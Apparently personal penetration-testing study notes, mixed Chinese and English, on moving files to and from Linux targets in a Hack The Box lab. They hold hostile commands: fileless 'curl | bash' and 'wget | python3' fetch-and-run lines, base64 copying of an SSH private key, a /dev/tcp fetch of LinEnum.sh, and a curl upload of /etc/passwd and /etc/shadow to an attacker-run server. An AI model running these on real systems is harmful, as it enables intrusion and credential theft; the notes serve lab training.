Linux

典型方法¶

打开网络服务器：

python3 -m http.server 80
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000

客户端：

Linux目标机：FileTransfers-Linux#Download
Windows目标机：FileTransfers-Windows#PowerShell Web Downloads

Netcat#文件传输

另外，可用简单的单行代码。

Download¶

Base64¶

cat id_rsa |base64 -w 0;echo (或 base64 id_rsa -w 0)

echo -n <base64-sting> | base64 -d > file

- 注意验证MD5

Web Downloads with Wget and cURL¶

一般：wget和curl直接下载。

Fileless Download with cURL¶

curl <url/shell.sh> | bash

Fileless Download with wget¶

wget -qO- <url/shell.py> | python3

-O-：output到标准输出。

Bash (/dev/tcp)¶

As long as Bash version 2.04 or greater is installed (compiled with --enable-net-redirections), the built-in /dev/TCP device file can be used for simple file downloads.

Connect to the Target Webserver¶

TimeLess613@htb[/htb]$ exec 3<>/dev/tcp/10.10.10.32/80

- <>：双向（或双向读写）重定向 - 3<>：打开文件描述符3同时进行读取和写入操作

HTTP GET Request¶

TimeLess613@htb[/htb]$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

Print the Response¶

TimeLess613@htb[/htb]$ cat <&3

scp¶

[!note] Note: You can create a temporary user account for file transfers and avoid using your primary credentials or keys on a remote computer.

Upload¶

Web Upload¶

Create a Self-Signed Certificate¶

TimeLess613@htb[/htb]$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

Generating a RSA private key
................................................................................+++++
.......+++++
writing new private key to 'server.pem'
-----

Start Web Server¶

[!note] The webserver should not host the certificate. We recommend creating a new directory to host the file for our webserver.

TimeLess613@htb[/htb]$ mkdir https && cd https

TimeLess613@htb[/htb]$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

Upload Multiple Files¶

TimeLess613@htb[/htb]$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

- --insecure：因为用的自签名证书。

scp¶

Misc¶

RDP¶

挂载

TimeLess613@htb[/htb]$ rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'

TimeLess613@htb[/htb]$ xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer

访问\\tsclient\

LOL¶

To search for the download and upload function in GTFOBins for Linux Binaries, we can use +file download or +file upload.